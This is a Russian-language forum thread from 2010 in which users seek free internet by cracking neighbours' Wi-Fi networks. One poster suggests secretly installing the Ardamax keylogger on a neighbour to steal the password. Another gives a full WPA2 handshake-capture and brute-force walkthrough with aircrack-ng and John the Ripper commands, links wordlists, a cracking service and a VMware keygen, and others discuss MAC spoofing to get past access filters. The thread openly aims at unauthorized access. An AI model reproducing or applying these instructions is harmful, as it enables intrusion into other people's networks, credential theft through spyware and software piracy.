что можно сделать?-через неделю снимают абоненку с уеби модема.денег нет-студент.а без инета сидеть не хочется...есть сеть с доступом к инету,доступ дается скорее всего по ip и mac...цепанулся cain and abel проснифил ip mac адреса,а поменять мас не могу (кричит мол на winде7 можно менять только если первые знаки 02 или 04...а таких я cain немогу).сигнал слабый,через раз подключается...есть еше за стеной высокоскоростной инет.раздается dlink_320(так у меня его находит)сигнал отличный.только CommView for WiFi нет дров на мой адаптер(Broadcom 802,11g)...да и пароли там дают сложные(кажется 16 или больше знаков,большие маленькие английские буквы)...зато скорость тут отличная...как думаете как найти халявный инет???что делать???(работать пойти чтоб свою абоненку погасить не могу-сессия скоро,а инет был бы отличной помошью в сдачи экзаменов,да и на уеби модеме скорость 20-50кбит/с а у соседа в 2мегабайта в секунду и безлимитка)

zevs92
03.12.2010, 18:49
ссори если что то не понятно написал,опыта пока нет...если что не понятно спрашивайте...большое спасибо заранее всем кто поможет...

Keltos
03.12.2010, 18:50
ставь BackTrack 4
и оттуда снифай

// в R2 должны быть дрова на твой адаптер

zevs92
03.12.2010, 19:32
BackTrack 4 взять нужно откуда то...у знакомых наврятли есть.насколько я слышал он весит много.а с инета со скоростью 20-50кбит я его буду качать недели 2)я эту то страничку минут 5 жду пока загрузиться...R2-что это такое?гугл говорит то ли ключ какойто толи почтовик

j-prof
03.12.2010, 19:37
вообще какойто тип шафрования в данном случае версия
ну скачай гденить в кафешке либо у знакомых

zevs92
03.12.2010, 19:43
не могу я пока его скачать сессия началась пар много...да и кафешек с wi fi бесплатным у нас пока нет(((

Keltos
03.12.2010, 20:23
Новая вышла.
http://www.backtrack-linux.org/downloads/

Kernel 2.6.35.8 – *Much* improved mac80211 stack.
USB 3.0 support.
New wireless cards supported.
All wireless Injection patches applied, maximum support for wireless attacks.
Even *faster* desktop environment.
Revamped Fluxbox environment for the KDE challenged.
Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
Updated old packages, added new ones, and removed obsolete ones.
New BackTrack Wiki with better documentation and support.
Our most professional, tested and streamlined release ever.

j-prof
03.12.2010, 20:26
расскажите кстати про инъекции чо это такое ваще

zevs92
03.12.2010, 21:40
извените что отхожу от темы но может кейлоджер соседу закинуть?ардамакс например?на нем удаленная установка есть...тока я почту не знаю хорошую чтоб ардамакс на нее скидывал...на xaker.ru он отчеты присылает но на нем почту блокируют через неделю если на нее кейлоджер присылает...а так мне кажется кейлоджером можно узнать пароль от wi fi сети???если как так ее взломать предложений не у кого нет

Kiko
04.12.2010, 00:17
Блин,где - то видел тему "Взлом Wi-Fi " или что - то такое,в поиске найти не могу,дайте ссылку.спасибо.

altblitz
04.12.2010, 18:26
Kiko,
backtrack aircrack-ng в поиск по форуму ?

grant22
05.12.2010, 13:02
кая вот проблема у моего соседа имеется роутер у меня wi fi usb adapter. он мне дал свой пароль и я спокойно подключался кнему пару дней сегодня при попытке подключится ничего не происходит. хочу заметить что модем вобще не отвечает. как бы обьяснить..... вот обычьно при попытке подключения к роутеру хоть даже с неверным паролем иконка в трее становится зеленой и там пишет получение сетевого адреса в моем случае вобще ничего не происходит иконка красная как бы я вобще и не нажимал подключиться.

p.s к другим сетям подключается нормально. извиняюсь за грамматику давно по русски не писал очень давно

Kastor
05.12.2010, 13:14
А уровень сигнала слабее не стал? Мой dlink dwa110 при слабом сигнале отказывается вобще что либо делать. Но если уровень прежний, а подключения нет то вероятно твой мак адрес поместили в черный список. Поэтому у тебя даже ip не выдается и так далее.

grant22
05.12.2010, 13:25
автоматом чтоли роутер мак блокирет? я пробывал с двух комов и двух разных адаптеров у меня dlink dwa 140 i zixel g202
сигнал dlinка сигнал 53% c zyxeля 25 думаю сигнал не имеет значения(((

j-prof
05.12.2010, 13:45
мож я с просонья туплю но поменяй мак на мак клиента

grant22
05.12.2010, 14:01
на мак самого роутера? потомучто мой друг подключаается через кабель к модему я единственный кто подключается через wi fi

kozel747
05.12.2010, 17:03
кому напряжно пользоваться программами для взлома АП купитеhttp://www.wifirobin.com/free-network правда ломает только wep зато никаких заморочек никаких программ утанавливать не нужно(купил ,опробовал,всё работает как и утверждают проиводители)но мне интереснее самому.кто купит спрашивайте что и как ,сейчас сижу курочу эту штуку может что-то ещё вытащу.

вот вам live-cd всего 45мб всё что нужно для взлома wi-fi никаких команд вводить не нужно,щёлкайте мышкой где нужно и всё, в архиве видео как им пользоваться.
Commview рядом не стоял по сравнению с этим , поверьте.запишите образ на болванку или запускайте с VMware как я. http://turbobit.net/quet9unne87z.html да кто хочет VMware скачайте с оф.сайта а здесь кейген http://turbobit.net/mzlyk75d1dfe.html

взлом WPA.

Я буду использовать Dlink DWL-G122 (USB), беспроводной сетевой интерфейс для этой процедуры. В backtrack4, это устройство признано wlan0.

Во-первых, поставить карту в режиме мониторинга:

.................................................. .............

root@bt:~# airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb -

.................................................. .............
root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb -
(monitor mode enabled on mon0)
.................................................. ..............

Хорошо, теперь мы можем использовать интерфейс mon0

Давайте найдём беспроводную сеть, которая использует WPA2 / PSK

.................................................. ...............

root@bt:~# airodump-ng mon0

CH 6 ]

.................................................. ...........................

Как результат, airodump-ng укажeт "WPA Handshake:" в верхнем правом углу

.................................................. ............................

CH 10 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

.................................................. ..............................

Остановитe airodump-ng и убедитесь, что файлы были созданы правильно

.................................................. .............................

root@bt:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

.................................................. ..............................

Есть 2 способа bruteforcing: один, который относительно быстр, но не гарантирует успеха и тот, который идет очень медленно, но гарантирует, что вы найдете ключ через определенный момент времени.

Первый вариант является использованием рабочего списка / dictionary file. Многие из этих файлов можно найти в Интернете, либо могут быть получены с помощью таких инструментов, как John the Ripper. Как только список слов будет создан, все что вам нужно сделать, это запустить Aircrack-ng подставив файл с Handshake и словарь word.txt

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

--------------------------------------------------------------------------------

Второй метод (bruteforcing) будет успешным наверняка, но это может занять много времени , чтобы закончить. Имейте в виду, WPA2 ключ может быть до 64 символов, так что в теории что-бы построить все сочетания паролей со всеми возможными наборами символов и скормить их в Aircrack займёт много времени. Если вы хотите использовать John The Ripper для создания всех возможных комбинаций паролей и скормить их в Aircrack-NG, это команда для использования:

.................................................. ................................

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

.................................................. ...............................

каждый символ в ключе может иметь 26 +26 +10 (62) возможных комбинаций. Так максимальное число комбинаций, которое должно быть проверено в процессе перебора 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 около 600 ключей в секунду на моем "медленном" аппарате, может занять более 101083382 часов, чтобы найти ключ (11539 года). Так что думайте об этом, когда ломаете WPA

----------------------------------------------------------------------------------------------------------------
вот вам в помощь несколько словарей

ComboFile http://turbobit.net/m15prul3v4vt.html

de-ice.net-1.110-1.0 http://turbobit.net/8jsypdjdkctf.html

de-ice.net-1.100-1.1 http://turbobit.net/ej38m25xhrmt.html

de-ice.net-2.100-1.1.part1 http://turbobit.net/0g2yjp1y77df.html

de-ice.net-2.100-1.1.part2 http://turbobit.net/7cbyz8sxarh7.html

роутеры и модемы Password List 2010-02-04 http://turbobit.net/fomdazyfg5ou.html

theargonlistver1 http://turbobit.net/kjf1h2eoyb46.html

webster-dictionary http://turbobit.net/2xhh12xca0cy.html

wpalist http://turbobit.net/700uk6nvpren.html

это вам поможет создать свой словарь

http://turbobit.net/u890gj1hortg.html

http://turbobit.net/ybuhr008jhtj.html

kozel747
05.12.2010, 17:23
да по поводу сигнала, мощность имеет огромное значение(не забывайте мощность сигнала и качество сигнала разные вещи)мощность может быть 90% а качество 30-40% тогда зацепить точку довольно сложно (отражённый сигнал и т.д.)точка не получает ваш запрос на подключение (на точке слабая антена,передатчик и т.д.)хотя вы её и видети,используйте для взлома хорошую антену и мощный адаптер.это 80% успеха.

Keltos
05.12.2010, 17:54
о чувак, я тебе еще на мыло писал
перезалей те файлы что выкладывал на других форумах

grant22
05.12.2010, 19:46
ну как бы тебе сказать точьку я не ломаю а ключь мне дали подключался я неделю dlink dwa 140 rangebooster мощнее мне не надо. сегодня стоял от точьки на расстоянии 2 метра с ноутом нифига.

trup_slona
06.12.2010, 17:56
скажите, если я поставлю BT на vmware, я смогу сканировать вайфай сети? у меня встроенный адаптер, не усб, системой поддерживается.

Huz
07.12.2010, 00:32
Доброго времени суток! Подскажите пожалуйста почему при исполнении команды airodump-ng mon0 выдает ошибку ioctl(SIOCSIFFLAGS) failed: Unknown error 132, модуль Atheros AR 5007 EG снял с другого ноутбука, там все работало. (bt4 r2)

novi4ek92
08.12.2010, 03:23
как используя систему backtrack 4 взломать точку где доступ в инетернет дается по определенным MAC и IP адрессам?

zserega
10.12.2010, 22:23
на жестком backtrack 4 r2 как войти в инет? wi-fi точка пароль есть.

akamaxmzx
11.12.2010, 21:49
итак имею ноут toshiba satellite .вопрос: шо нить есть для ноутовского expresscard wifi карточка шоб wpa поиметь на линуксе?нашел такую но не знаю купить или нет хотя чип там atheros DLink DWA-643. ExpressCard/34. P.S. со встроенной картой поимел wep.всего 6 точек за 20-30 мин ось Beini 1.2 :cool:

Kverter
15.12.2010, 18:14
точка какая ад-хок?????

ZiLiBoBa
21.12.2010, 07:49
при помощи CommView for WiFi и aircrack-ng получил пароль к wi-fi сети
подключаюсь к ней, но пишет что "Ограниченный доступ"
как нормально подключиться?

p.s. интересует халявный инет

dupD0M
23.12.2010, 16:30
подскажите вайфай роутер он только раздает инет или он может и искать точки и к ним подключатся?

Kastor
23.12.2010, 17:07
Это смотря какая точка доступа. Нужно заглянуть в их характеристики. Есть такие АР, которые только в режиме Инфраструктура работают, то есть через нее могут соединяться компы в сеть. А есть такие, что могут и сами выступать в роли клиентов и подключаться к другим сетям, или вобще работать как повторители.
Только прими во внимание, что не все точки доступа могут раздавать инет. Вот моя DLINK DAP 1150 это просто аналог обычного коммутатора. Для раздачи нета, тебе нужен роутер с WiFi на борту. То есть в него втыкаешь шнур с инетом, а по WiFi уже раздаешь на другие компы.

dupD0M
23.12.2010, 17:12
вообщев дело такое!у меня dlink dir300 вот я получаю инет от него т.к в него втыкнут wan порт!а тут мне информация потступила что недалеко от меня ловит вайфай с хорошим инетом но с паролем(пароль я не знаю надо брутить)следует меня интерисует вопром:через этот роутер можно взломать вайфай т.к у него сьемная антена!а покупать в комп другой адаптер не хочется так как пока нет средств!вроде бы все иложил)))

Kastor
24.12.2010, 02:45
Все понятно. Но, к сожалению, DLINK DIR300 не может работать в режиме клиента. То есть тебе не удастся с ее помощью подключиться к чужой сети. Да к тому же, я не слышал про способы взлома сетей используя точки доступа, как клиентские устройства. Есть мысль прошить твою точку доступа. Моя DLINK DAP 1150 после прошивки значительно прибавила режимов работы (хотя клиентом и так могла быть). Но мне один знающий человек говорил, что на DIR 300 стоит слабое железо, поэтому ее перешивать не стоит.
Вывод такой: сломать при помощи твоей АР ту сеть ну никак не выйдет =)

На счет съемной антены на АР. Большинство из них идут с усилением 2dBi. А говорят, рамка вокруг экрана ноута, дает усиление в 4-5 dBi. Вот, может кто знает наверняка, так ли это?

tross
24.12.2010, 08:49
Сообщение от tross
помагите кто нибуть с ключиком .3 мес тыкаю тыкаю .все совари просканил че только не пробывал Backtrack 4, aircrack-ng не помогло http://depositfiles.com/de/files/0gphmhxw4 1C:BD:B9:B8:B7:F4
andrey

tross
24.12.2010, 09:05
На счет съемной антены на АР. Большинство из них идут с усилением 2dBi. А говорят, рамка вокруг экрана ноута, дает усиление в 4-5 dBi. Вот, может кто знает наверняка, так ли это?
не дает ни какова уселения .там две пластинки медных 3 на 3 см .а чтоб усилить стимаете крыжачку снизу ноута под вай фай там два поводка с конектороми .нутак береш другой проводок с др ноута а на конце антенку самоделку .прибавка мощнасти +25-40%а если еще за окно вынести район весь твой

dupD0M
24.12.2010, 13:59
не дает ни какова уселения .там две пластинки медных 3 на 3 см .а чтоб усилить стимаете крыжачку снизу ноута под вай фай там два поводка с конектороми .нутак береш другой проводок с др ноута а на конце антенку самоделку .прибавка мощнасти +25-40%а если еще за окно вынести район весь твой
я как раз об этом читал ну как то ноут разбирать не хочется и он еще на гарантии!

tross
24.12.2010, 15:57
там отдельнный лючок должен быть смотря какая модель

dupD0M
24.12.2010, 16:00
toshiba satellite A300
я за него уже много перечитал и как написано до вайфая добратся не разбирая не как не получится!